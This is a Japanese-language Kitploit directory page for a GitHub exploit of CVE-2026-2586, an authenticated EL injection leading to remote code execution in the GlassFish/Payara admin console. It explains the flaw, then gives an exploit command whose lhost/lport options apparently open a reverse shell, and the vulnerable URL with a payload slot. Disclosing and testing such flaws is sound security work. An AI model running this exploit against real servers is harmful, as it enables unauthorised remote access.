Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-2586 — GlassFish/Payara 管理コンソールの認証済み EL インジェクションエクスプロイト。仮想サーバー設定フローで細工されたパラメータを介してリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/deepsecurityresearch/cve-2026-2586
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubdeepsecurityresearch/cve-2026-2586

CVE-2026-2586

GlassFish/Payara 管理コンソールの認証済み EL インジェクションエクスプロイト。仮想サーバー設定フローで細工されたパラメータを介してリモートコード実行を可能にします。

リポジトリを見る
213ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

認証済みGlassFish ELインジェクション RCE (CVE-2026-2586)

GlassFish管理コンソールにおけるExpression Language(EL)インジェクションの脆弱性により、認証済みユーザーが管理用Webインターフェースで処理されるパラメータに悪意のあるEL式を注入できる可能性があります。悪用に成功すると、影響を受けるサーバー上でリモートコード実行につながる可能性があります。

この脆弱性は、アプリケーションがユーザー制御のパラメータを安全でない方法で解釈する、サーバーの仮想構成編集フローにおいて確認されました。

この脆弱性が発生する理由は次のとおりです。

  • 管理インターフェースは、EL式内でユーザー制御のパラメータを処理します。
  • 入力は、バックエンドで解釈される前に適切に検証または無害化されません。
  • 管理コンソールの認証済みユーザーは、この脆弱な動作を悪用してJavaクラスおよびメソッドを呼び出すことができます。
  • 悪用に成功した場合、有効な認証情報を持つ攻撃者は、基盤となるオペレーティングシステム上でコマンドを実行できる可能性があります。

影響を受けるコンポーネント

  • 製品: GlassFish / Payara Administration Console
  • CVE: CVE-2026-2586
  • 種別: Expression Language Injection
  • 影響: 認証済みリモートコード実行
  • ベクター: 管理用Webインターフェース

概念実証

テストは、ローカルで管理された環境で実施されました。

root@kitploit:~
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure

脆弱なURL:

https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true

免責事項

許可された用途のみに使用してください。DeepSecurity Perúは不正アクセスを推奨せず、提供された情報の誤用について一切の責任を負いません。

ツールをダウンロード